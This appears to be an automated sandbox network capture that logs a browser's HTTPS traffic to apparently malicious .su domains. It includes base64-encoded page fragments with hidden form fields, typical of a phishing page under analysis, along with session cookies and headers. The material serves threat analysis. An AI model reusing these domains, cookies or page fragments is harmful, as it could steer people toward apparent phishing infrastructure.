                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1369INData Raw: 59 32 46 73 57 54 6f 67 59 32 46 73 59 79 68 32 59 58 49 6f 4c 53 31 6a 59 57 78 49 4b 53 41 72 49 44 49 77 63 48 67 70 4f 77 30 4b 49 43 41 67 49 43 30 74 59 32 46 73 57 55 56 34 64 44 6f 67 59 32 46 73 59 79 68 32 59 58 49 6f 4c 53 31 6a 59 57 78 49 4b 53 41 74 49 44 67 77 63 48 67 70 4f 77 30 4b 49 43 41 67 49 43 30 74 59 32 46 73 57 55 39 32 5a 58 4a 46 65 48 51 36 49 47 4e 68 62 47 4d 6f 64 6d 46 79 4b 43 30 74 59 32 46 73 53 43 6b 67 4c 53 41 35 4d 6e 42 34 4b 54 73 4e 43 69 41 67 49 43 41 74 4c 57 5a 73 59 58 42 54 4f 69 41 35 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 43 30 74 5a 6d 78 68 63 45 67 36 49 47 4e 68 62 47 4d 6f 4d 43 34 31 4e 53 41 71 49 48 5a 68 63 69 67 74 4c 57 56 75 64 6b 67 70 4b 54 73 4e 43 69 41 67 49 43 41 74 4c 57 5a 73 59 58 42
                                                                                                                                                                                                        Data Ascii: Y2FsWTogY2FsYyh2YXIoLS1jYWxIKSArIDIwcHgpOw0KICAgIC0tY2FsWUV4dDogY2FsYyh2YXIoLS1jYWxIKSAtIDgwcHgpOw0KICAgIC0tY2FsWU92ZXJFeHQ6IGNhbGModmFyKC0tY2FsSCkgLSA5MnB4KTsNCiAgICAtLWZsYXBTOiA5NnB4Ow0KICAgIC0tZmxhcEg6IGNhbGMoMC41NSAqIHZhcigtLWVudkgpKTsNCiAgICAtLWZsYXB
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1369INData Raw: 48 4a 68 62 6e 4e 6d 62 33 4a 74 4f 6e 52 79 59 57 35 7a 62 47 46 30 5a 53 67 74 4d 54 55 7a 63 48 67 73 4c 54 63 77 63 48 67 70 49 48 4a 76 64 47 46 30 5a 53 67 79 4f 47 52 6c 5a 79 6b 37 66 51 30 4b 49 32 56 6d 50 69 35 79 65 33 64 70 5a 48 52 6f 4f 6a 49 34 4e 33 42 34 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 36 49 7a 45 30 4f 54 42 6b 5a 6a 74 30 63 6d 46 75 63 32 5a 76 63 6d 30 36 64 48 4a 68 62 6e 4e 73 59 58 52 6c 4b 43 30 78 4d 6a 42 77 65 43 77 32 4d 33 42 34 4b 53 42 79 62 33 52 68 64 47 55 6f 4c 54 49 34 5a 47 56 6e 4b 54 74 39 44 51 6f 6a 5a 57 4a 37 64 32 6c 6b 64 47 67 36 64 6d 46 79 4b 43 30 74 5a 57 35 32 56 79 6b 37 61 47 56 70 5a 32 68 30 4f 6a 51 77 63 48 67 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 44 6f 6a 4d 54 49 7a 59 6a 5a 6b
                                                                                                                                                                                                        Data Ascii: HJhbnNmb3JtOnRyYW5zbGF0ZSgtMTUzcHgsLTcwcHgpIHJvdGF0ZSgyOGRlZyk7fQ0KI2VmPi5ye3dpZHRoOjI4N3B4O2JhY2tncm91bmQ6IzE0OTBkZjt0cmFuc2Zvcm06dHJhbnNsYXRlKC0xMjBweCw2M3B4KSByb3RhdGUoLTI4ZGVnKTt9DQojZWJ7d2lkdGg6dmFyKC0tZW52Vyk7aGVpZ2h0OjQwcHg7YmFja2dyb3VuZDojMTIzYjZk
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1369INData Raw: 52 47 62 47 46 77 65 33 64 70 5a 48 52 6f 4f 6e 5a 68 63 69 67 74 4c 57 56 75 64 6c 63 70 4f 32 46 75 61 57 31 68 64 47 6c 76 62 6a 70 6a 62 47 39 7a 5a 57 51 74 5a 6d 78 68 63 43 31 7a 64 32 6c 75 5a 79 42 32 59 58 49 6f 4c 53 31 6b 64 58 49 70 49 47 6c 75 5a 6d 6c 75 61 58 52 6c 4f 32 46 75 61 57 31 68 64 47 6c 76 62 69 31 30 61 57 31 70 62 6d 63 74 5a 6e 56 75 59 33 52 70 62 32 34 36 59 33 56 69 61 57 4d 74 59 6d 56 36 61 57 56 79 4b 44 41 75 4d 7a 49 73 4d 43 77 77 4c 6a 59 33 4c 44 41 70 4f 33 52 79 59 57 35 7a 5a 6d 39 79 62 53 31 76 63 6d 6c 6e 61 57 34 36 64 47 39 77 4f 33 52 79 59 57 35 7a 5a 6d 39 79 62 54 70 30 63 6d 46 75 63 32 78 68 64 47 56 5a 4b 47 4e 68 62 47 4d 6f 4c 54 45 67 4b 69 42 32 59 58 49 6f 4c 53 31 6c 62 6e 5a 49 4b 53 6b 70 49
                                                                                                                                                                                                        Data Ascii: RGbGFwe3dpZHRoOnZhcigtLWVudlcpO2FuaW1hdGlvbjpjbG9zZWQtZmxhcC1zd2luZyB2YXIoLS1kdXIpIGluZmluaXRlO2FuaW1hdGlvbi10aW1pbmctZnVuY3Rpb246Y3ViaWMtYmV6aWVyKDAuMzIsMCwwLjY3LDApO3RyYW5zZm9ybS1vcmlnaW46dG9wO3RyYW5zZm9ybTp0cmFuc2xhdGVZKGNhbGMoLTEgKiB2YXIoLS1lbnZIKSkpI
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1369INData Raw: 6d 62 33 4a 74 4f 6e 52 79 59 57 35 7a 62 47 46 30 5a 56 6b 6f 64 6d 46 79 4b 43 30 74 59 32 46 73 57 55 56 34 64 43 6b 70 49 48 4e 6a 59 57 78 6c 57 53 67 78 4b 54 74 68 62 6d 6c 74 59 58 52 70 62 32 34 74 64 47 6c 74 61 57 35 6e 4c 57 5a 31 62 6d 4e 30 61 57 39 75 4f 6d 4e 31 59 6d 6c 6a 4c 57 4a 6c 65 6d 6c 6c 63 69 67 77 4c 6a 59 32 4c 43 30 77 4c 6a 45 32 4c 44 45 73 4c 54 41 75 4d 6a 6b 70 4f 33 31 39 44 51 70 41 61 32 56 35 5a 6e 4a 68 62 57 56 7a 49 47 39 77 5a 57 35 6c 5a 43 31 6d 62 47 46 77 4c 58 4e 33 61 57 35 6e 65 7a 41 6c 4c 44 45 77 4d 43 55 73 4d 54 51 75 4e 53 55 73 4e 7a 59 6c 65 33 52 79 59 57 35 7a 5a 6d 39 79 62 54 70 30 63 6d 46 75 63 32 78 68 64 47 56 5a 4b 43 30 32 4f 48 42 34 4b 53 42 79 62 33 52 68 64 47 55 7a 5a 43 67 78 4c 44
                                                                                                                                                                                                        Data Ascii: mb3JtOnRyYW5zbGF0ZVkodmFyKC0tY2FsWUV4dCkpIHNjYWxlWSgxKTthbmltYXRpb24tdGltaW5nLWZ1bmN0aW9uOmN1YmljLWJlemllcigwLjY2LC0wLjE2LDEsLTAuMjkpO319DQpAa2V5ZnJhbWVzIG9wZW5lZC1mbGFwLXN3aW5nezAlLDEwMCUsMTQuNSUsNzYle3RyYW5zZm9ybTp0cmFuc2xhdGVZKC02OHB4KSByb3RhdGUzZCgxLD
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1369INData Raw: 50 43 39 6b 61 58 59 2b 50 43 39 6b 61 58 59 2b 50 47 52 70 64 69 42 70 5a 44 30 69 59 32 46 73 49 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 49 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 79 49 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 7a 49 48 4d 78 49 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 7a 49 48 4d 79 49 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 7a 49 48 4d 7a 49 6a 34 38 4c 32 52 70 64 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 79 49 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 7a 49 48 4d 30 49 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a
                                                                                                                                                                                                        Data Ascii: PC9kaXY+PC9kaXY+PGRpdiBpZD0iY2FsIj48ZGl2IGNsYXNzPSJ0Ij48L2Rpdj48ZGl2IGNsYXNzPSJyIj48ZGl2IGNsYXNzPSJzIHMxIj48L2Rpdj48ZGl2IGNsYXNzPSJzIHMyIj48L2Rpdj48ZGl2IGNsYXNzPSJzIHMzIj48L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSJyIj48ZGl2IGNsYXNzPSJzIHM0Ij48L2Rpdj48ZGl2IGNsYXNzPSJ
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1369INData Raw: 53 42 6f 59 57 4a 70 64 43 34 67 4c 53 30 2b 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6c 56 75 61 32 35 76 64 32 34 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 56 6a 59 32 56 7a 63 79 42 70 63 79 42 75 62 33 51 67 64 47 68 6c 49 47 46 69 63 32 56 75 59 32 55 67 62 32 59 67 5a 6d 46 70
                                                                                                                                                                                                        Data Ascii: SBoYWJpdC4gLS0+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9IlVua25vd24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8IS0tIDxkaXY+U3VjY2VzcyBpcyBub3QgdGhlIGFic2VuY2Ugb2YgZmFp
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1141INData Raw: 34 32 4d 7a 59 75 4d 7a 63 30 4c 6a 67 32 4e 53 34 79 4e 44 63 75 4d 6a 4d 75 4e 54 55 79 4c 6a 4d 30 4e 53 34 35 4d 44 59 75 4d 7a 51 31 63 79 34 32 4e 69 30 75 4d 54 45 31 4c 6a 6b 78 4c 53 34 7a 4e 44 56 6a 4c 6a 49 31 4c 53 34 79 4d 79 34 7a 4e 7a 6b 74 4c 6a 55 79 4c 6a 4d 33 4f 53 30 75 4f 44 59 31 49 44 41 74 4c 6a 4d 7a 4f 53 30 75 4d 54 49 31 4c 53 34 32 4d 7a 49 74 4c 6a 4d 33 4c 53 34 34 4e 7a 4e 68 4d 53 34 79 4e 6a 49 67 4d 53 34 79 4e 6a 49 67 4d 43 41 77 4d 43 30 75 4f 54 45 35 4c 53 34 7a 4e 6a 4e 4e 4e 54 49 75 4e 44 63 33 49 44 63 75 4e 6a 59 7a 59 54 55 75 4f 44 6b 79 49 44 55 75 4f 44 6b 79 49 44 41 67 4d 44 41 74 4d 53 34 78 4f 44 49 74 4c 6a 45 79 4e 32 4d 74 4c 6a 6b 33 4d 53 41 77 4c 54 45 75 4f 44 4d 34 4c 6a 49 77 4f 53 30 79 4c
                                                                                                                                                                                                        Data Ascii: 42MzYuMzc0Ljg2NS4yNDcuMjMuNTUyLjM0NS45MDYuMzQ1cy42Ni0uMTE1LjkxLS4zNDVjLjI1LS4yMy4zNzktLjUyLjM3OS0uODY1IDAtLjMzOS0uMTI1LS42MzItLjM3LS44NzNhMS4yNjIgMS4yNjIgMCAwMC0uOTE5LS4zNjNNNTIuNDc3IDcuNjYzYTUuODkyIDUuODkyIDAgMDAtMS4xODItLjEyN2MtLjk3MSAwLTEuODM4LjIwOS0yL


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        8192.168.2.449748172.67.144.374434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                        Host: eff.contempi.su
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://eff.contempi.su/DJuy2C6F/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlZKbTZDWG1iU1pZSEg0UDBsMUcwclE9PSIsInZhbHVlIjoibGxlenh6RE9VbldaVllOamUwK3dPaExuMVBFbU9wVDBOZWpVRy80aVhWMjMyU3lxMEhlZmFaSGZ5R0crcm9MVWFOZWdpSzdyV0N6eUVNRmdweUc1UGNLeDk2a3hQaHFDOHFhOXd5YzNJbjUwSktuWUNmd2Fha21RaVdjSlFKeFAiLCJtYWMiOiIyNWFiYTA4MmQ5MjM2YjJjYWEyY2RhYWE3YzMwMDZiZGVmZGIxZmFiZWM4MzcyMTJmNTBkM2U0MTRiYmEyZDI1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im5IOTBzKyt0ZmJPdk9YaTJqaDV1MFE9PSIsInZhbHVlIjoiRzN3alZwaENRQjMyS1ZvaTZlNHJGUFpWOWxqMG8ycXgyd09Bek0rd3poQ1NBS3Y4UldsYVBzVmZJK1JxWVp6bjMvbFIwTWlzclFDSVRLNXJSM3NyUEVpdzhUQTZpbXBkTjFsMy9BZ3ArR2VCaWZFZVFpcFowLzRML00xUjRWMVciLCJtYWMiOiJhMTRiMzhkMDJiZDY3MGJiMWFmNDVkNWY4NmU4ZTQ0ODAzMjJiM2UyNDEwZmU2ZjdhYmYzNTNlNTU4NzU2NmNiIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC638INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:53 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V2GLsojLfKOOiS6S7euY9RA8VcaiLizOZb4cfohenrEJcVLa45nwo%2FhpYgo9wLYBxNNlmiu2qwdNLwGoDEuIwzbLIZbR2mR762b8%2BE4t3GtpRa4EWiZO4Af0kYtYIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Age: 13819
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8b3994f5f845430a-EWR
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        9192.168.2.449749108.167.132.1994434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:54 UTC348OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                        Host: foxloc.com.br
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:54 UTC176INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:54 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        10192.168.2.449750188.114.96.34434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:54 UTC609OUTGET /bimffjrqdyqqywotmgukxknFrlaLVDISNZJPKCEJEZQVNOEOUAVXEJJJKCJXKDJJA HTTP/1.1
                                                                                                                                                                                                        Host: ygbz.prosolmi.su
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://eff.contempi.su
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://eff.contempi.su/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:55 UTC606INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:55 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X90BKUnJWQ5IWkNHiVNH89yxLgmHFRkA8M45m3kpXVqy0jfnrMgpYZUKAcE1wyRAQfxxkkBTdhk%2FV%2B3m1b8ulptVBoHK%2FkYAYUIvUny6kVsqePDJV9RlnstOVjOgLwJV%2Bl8K"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8b3994fb8cf33338-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:55 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                        Data Ascii: 11
                                                                                                                                                                                                        2024-08-15 13:37:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        11192.168.2.44975135.190.80.14434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:54 UTC532OUTOPTIONS /report/v4?s=V2GLsojLfKOOiS6S7euY9RA8VcaiLizOZb4cfohenrEJcVLa45nwo%2FhpYgo9wLYBxNNlmiu2qwdNLwGoDEuIwzbLIZbR2mR762b8%2BE4t3GtpRa4EWiZO4Af0kYtYIA%3D%3D HTTP/1.1
                                                                                                                                                                                                        Host: a.nel.cloudflare.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Origin: https://eff.contempi.su
                                                                                                                                                                                                        Access-Control-Request-Method: POST
                                                                                                                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:54 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        access-control-max-age: 86400
                                                                                                                                                                                                        access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                        date: Thu, 15 Aug 2024 13:37:54 GMT
                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        12192.168.2.44975235.190.80.14434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:55 UTC474OUTPOST /report/v4?s=V2GLsojLfKOOiS6S7euY9RA8VcaiLizOZb4cfohenrEJcVLa45nwo%2FhpYgo9wLYBxNNlmiu2qwdNLwGoDEuIwzbLIZbR2mR762b8%2BE4t3GtpRa4EWiZO4Af0kYtYIA%3D%3D HTTP/1.1
                                                                                                                                                                                                        Host: a.nel.cloudflare.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 429
                                                                                                                                                                                                        Content-Type: application/reports+json
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:55 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 65 66 66 2e 63 6f 6e 74 65 6d 70 69 2e 73 75 2f 44 4a 75 79 32 43 36 46 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 34 2e 33 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                                                                                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":114,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://eff.contempi.su/DJuy2C6F/","sampling_fraction":1.0,"server_ip":"172.67.144.37","status_code":404,"type":"http.error"},"type":"network-error
                                                                                                                                                                                                        2024-08-15 13:37:55 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        date: Thu, 15 Aug 2024 13:37:55 GMT
                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        13192.168.2.449755188.114.96.34434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:55 UTC405OUTGET /bimffjrqdyqqywotmgukxknFrlaLVDISNZJPKCEJEZQVNOEOUAVXEJJJKCJXKDJJA HTTP/1.1
                                                                                                                                                                                                        Host: ygbz.prosolmi.su
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:56 UTC608INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:56 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pflOEtI%2BkvqpwlO9PbsCUpqeUWRz8z%2BvGfe0PbH6G1EqPl6SQJS0Kj9ssb%2BLmqvR1YCoY7SK%2Fy4x3RpidGARWch7J8GCGkUNhNLhZT8Cyk1Kinn2C7dqYUcDEf%2FHGXBbzri3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8b3995057e8a4309-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:56 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                        Data Ascii: 11
                                                                                                                                                                                                        2024-08-15 13:37:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        14192.168.2.449759151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC821OUTGET /images/I/41-WpIOxHtL._RC%7C71S7yoZEbpL.css,51u4GJlQjiL.css,118zqOsmV-L.css,31-P1-9TebL.css,31YZpDCYJPL.css,21pkK7OQMnL.css,41Xj8tZc2XL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11EKggV-DlL.css,415g7iDx4VL.css,11qTzxZ0Y5L.css_.css?AUIClients/NavDesktopUberAsset&JoiNCr6G HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
